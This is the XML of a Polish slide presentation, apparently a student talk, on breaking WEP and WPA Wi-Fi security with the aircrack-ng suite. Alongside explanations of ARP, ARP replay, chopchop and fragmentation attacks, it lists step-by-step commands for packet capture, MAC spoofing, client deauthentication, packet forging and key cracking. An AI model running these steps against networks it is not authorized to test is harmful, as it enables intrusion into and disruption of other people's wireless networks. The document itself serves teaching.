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4" r:id="rId2"/>
    <p:sldId id="256" r:id="rId3"/>
    <p:sldId id="266" r:id="rId4"/>
    <p:sldId id="275" r:id="rId5"/>
    <p:sldId id="267" r:id="rId6"/>
    <p:sldId id="268" r:id="rId7"/>
    <p:sldId id="265" r:id="rId8"/>
    <p:sldId id="257" r:id="rId9"/>
    <p:sldId id="269" r:id="rId10"/>
    <p:sldId id="276" r:id="rId11"/>
    <p:sldId id="258" r:id="rId12"/>
    <p:sldId id="259" r:id="rId13"/>
    <p:sldId id="261" r:id="rId14"/>
    <p:sldId id="270" r:id="rId15"/>
    <p:sldId id="262" r:id="rId16"/>
    <p:sldId id="264" r:id="rId17"/>
    <p:sldId id="263" r:id="rId18"/>
    <p:sldId id="271" r:id="rId19"/>
    <p:sldId id="272" r:id="rId20"/>
    <p:sldId id="273" r:id="rId21"/>
    <p:sldId id="277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BBB1B-5679-46BD-8C15-58ACF3F41847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5859D-A48E-4F03-B2BA-4FA65D94B6E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5859D-A48E-4F03-B2BA-4FA65D94B6EB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B1D3-E0BC-4383-83A7-20194D9828A0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7642-70F4-4E2A-ACD1-372F838CF3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B1D3-E0BC-4383-83A7-20194D9828A0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7642-70F4-4E2A-ACD1-372F838CF3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B1D3-E0BC-4383-83A7-20194D9828A0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7642-70F4-4E2A-ACD1-372F838CF3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B1D3-E0BC-4383-83A7-20194D9828A0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7642-70F4-4E2A-ACD1-372F838CF3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B1D3-E0BC-4383-83A7-20194D9828A0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7642-70F4-4E2A-ACD1-372F838CF3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B1D3-E0BC-4383-83A7-20194D9828A0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7642-70F4-4E2A-ACD1-372F838CF3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B1D3-E0BC-4383-83A7-20194D9828A0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7642-70F4-4E2A-ACD1-372F838CF3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B1D3-E0BC-4383-83A7-20194D9828A0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7642-70F4-4E2A-ACD1-372F838CF3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B1D3-E0BC-4383-83A7-20194D9828A0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7642-70F4-4E2A-ACD1-372F838CF3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B1D3-E0BC-4383-83A7-20194D9828A0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7642-70F4-4E2A-ACD1-372F838CF3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B1D3-E0BC-4383-83A7-20194D9828A0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7642-70F4-4E2A-ACD1-372F838CF3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8B1D3-E0BC-4383-83A7-20194D9828A0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C7642-70F4-4E2A-ACD1-372F838CF3D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rcrack-ng.org/doku.php?id=compatibility_driver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6732240" y="5589240"/>
            <a:ext cx="20265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dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Jakub Lewandowski</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Jarosław Wilga</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" dirty="0">
              <a:solidFill>
                <a:srgbClr val="99FF33"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Obraz 5" descr="aircrack-ng-new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564904"/>
            <a:ext cx="2870200" cy="1397000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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Filtrowanie po adresach mac.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airodump-ng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-c &lt;numer kanału&gt; --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bssid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&lt;adres mac routera&gt; -a wlan0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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macchanger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-m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aa:bb:cc:dd:ee:ff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&lt;interfejs&gt;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ARP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 err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Resolution </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Protocol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(ARP) - protokół sieciowy umożliwiający konwersję logicznych adresów warstwy sieciowej na fizyczne adresy warstwy łącza danych. Protokół ten nie ogranicza się tylko do konwersji adresów IP na adres MAC stosowany w sieciach Ethernet, lecz jest także wykorzystywany do odpytywania o adresy fizyczne stosowane w technologiach </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ring czy FDDI. </a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL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Zasady działania ARP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>
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>w celu ustalenia adresu fizycznego hosta docelowego wysyłane jest żądanie ARP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t> do wszystkich hostów znajdujących się w tej samej sieci. Zapytanie zawiera adres logiczny hosta docelowego oraz adres fizyczny hosta wysyłającego zapytanie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>na zapytanie odpowiada tylko ten host, którego adres logiczny jest identyczny z adresem logicznym umieszczonym w zapytaniu. Odpowiedź zawiera adres logiczny i fizyczny hosta docelowego.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Odebrany adres fizyczny zapisywany jest w tablicy ARP i parowany z adresem logicznym hosta docelowego, dzięki czemu nie będzie wymagane ponowne odkrywanie adresu fizycznego do momentu wyczyszczenia tablicy</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL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ARP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Replay </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ttack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>
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Klasyczny ARP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Replay </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t> jest najbardziej efektywną drogą do generowania nowych wektorów inicjalizujących (IV), który pracuje bardzo niezawodnie. Program nasłuchuje pakiety ARP, a następnie odsyła je z powrotem do punktu dostępowego. To, z kolei, powoduje że punkt dostępowy powtarza pakiet ARP z nowym IV. Program ponownie rozsyła te same pakiety ARP w kółko. Jednakże, każdy pakiet ARP powtarzany przez punkt dostępowy ma nowy IV. Wszystkie te nowe IV pozwalają na złamanie klucza WEP.</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL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99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sieć z zabezpieczeniem WEP </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(z podłączonymi klientami)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airodump-ng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-c &lt;numer kanału&gt; --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bssid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&lt;adres mac routera&gt; -a -w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zapisywane_pakiety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&lt;interfejs&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="pl-PL" sz="1800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="99FF33"/>
              </a:solidFill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rgbClr val="99FF33"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Dane zapisane w plikach:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0"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zapisywane_pakiety-01.cap</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0"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zapisywane_pakiety-01.csv</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0"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zapisywane_pakiety-01.kismet.csv</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0"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zapisywane_pakiety-01.kismet.netxml</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0"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aireplay-ng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-1 &lt;czas pomiędzy kolejnymi próbami podłączenia&gt; -a &lt;mac adres routera&gt; -h &lt;mac naszego interfejsu&gt; &lt;interfejs&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0"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aireplay-ng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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-3 -a &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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mac</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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routera</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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&gt; -h &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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nasz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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mac</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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&gt; &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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interfejs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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aireplay-ng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-0 &lt;liczba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pakietow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&gt; -a &lt;mac routera&gt; -c &lt;mac klienta&gt; &lt;interfejsu&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0"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aircrack-ng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nazwapliku.cap</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" sz="1400" dirty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solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>KoreK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>chopchop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>attack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Ten atak, jeśli się powiedzie, może odszyfrować pakiet danych WEP bez znajomości klucza. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Może on też zadziałać dla dynamicznego WEP.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Atak ten nie odzyskuje klucza WEP, ale ujawnia </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>plaintext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Niektóre punkty dostępowe nie są podatne na ten atak.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="pl-PL" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="99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IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fragmentation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>attack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rgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Fragmentacja IP to proces łamania jednego bloki IP poprzez wiele pakietów o małym rozmiarze. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Każde połączenie sieciowe posiada charakterystyczny rozmiar wiadomości, który jest przekazywany – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>maximum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>transmission</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t> unit (MTU).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fragmentation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t> używa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>do ataku protokołu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fragmentacji.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="pl-PL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PRGA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pl-PL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pseudo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>random </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>generation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>algorithm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(PRGA)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t> opiera się na generatorach </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>liczb pseudolosowych </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>przede wszystkim w celu tworzenia unikalnych kluczy stałych oraz sesyjnych. Ze względu na fakt, że bezpieczeństwo komunikacji zależy od jakości klucza, od implementacji </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PRGA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stosowanych w takich celach oczekuje się między innymi, że:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Generowane wartości będą każdorazowo praktycznie nieprzewidywalne dla osób postronnych (np. przez wykorzystanie odpowiednich źródeł danych przy tworzeniu ziarna).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Nie będzie możliwe ustalenie ziarna lub stanu wewnętrznego generatora na podstawie obserwacji dowolnie długiego ciągu wygenerowanych bitów.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Znajomość dowolnej liczby wcześniej wygenerowanych bitów nie będzie wystarczała, by odgadnąć dowolny przyszły bit z prawdopodobieństwem istotnie wyższym od </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1/2.</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" dirty="0">
              <a:solidFill>
                <a:srgbClr val="99FF33"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dla wszystkich możliwych wartości ziarna, zachowana będzie pewna minimalna, dopasowana do zastosowania długość cyklu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PRGA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(aby uniknąć ponownego wykorzystania takiego samego klucza).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="pl-PL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99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sieć z zabezpieczeniem WEP </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(bez podłączonych klientów)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l-PL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aireplay-ng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL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-1 &lt;czas pomiędzy kolejnymi próbami podłączenia&gt; -a &lt;mac routera&gt; -h &lt;mac interfejsu&gt; &lt;interfejs&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="pl-PL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aireplay-ng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL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-4 -a &lt;mac routera&gt; -h &lt;nasz mac&gt; &lt;interfejs&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="pl-PL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aireplay-ng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL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-5 -a &lt;mac routera&gt; -h &lt;nasz mac&gt; &lt;interfejs&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="pl-PL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packetforge-ng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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-0 -a &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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mac</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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router&gt; -h &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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nasz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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mac</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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&gt; -k 255.255.255.255 -l 255.255.255.255 -y fragment-0530-141645.xor -w </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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arpy</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL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pl-PL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airodump-ng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL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-c &lt;numer kanału&gt; --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL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bssid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL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&lt;adres mac routera&gt; -a -w </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL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zapisywane_pakiety</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL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&lt;interfejs&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="pl-PL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aireplay-ng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL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-2 -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL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pl-PL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arpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL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-h &lt;mac interfejsu&gt; &lt;interfejs&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="pl-PL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aircrack-ng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL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nazwapliku.cap</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" dirty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Sieć z zabezpieczeniem WPA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sz="12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airodump-ng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="12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-c &lt;numer kanału&gt; --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="12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bssid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="12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&lt;adres mac routera&gt; -a -w </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="12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zapisywane_pakiety</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="12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&lt;interfejs&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="pl-PL" sz="12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2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aireplay-ng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="12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-0 &lt;liczba </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="12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pakietow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="12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&gt; -a &lt;mac routera&gt; -c &lt;mac klienta&gt; &lt;interfejsu&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="pl-PL" sz="12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2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aircrack-ng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="12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–w </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="12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slownik.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="12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2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nazwapliku.cap</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" sz="12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Jak złamać zabezpieczenia </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="pl-PL" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="99FF33"/>
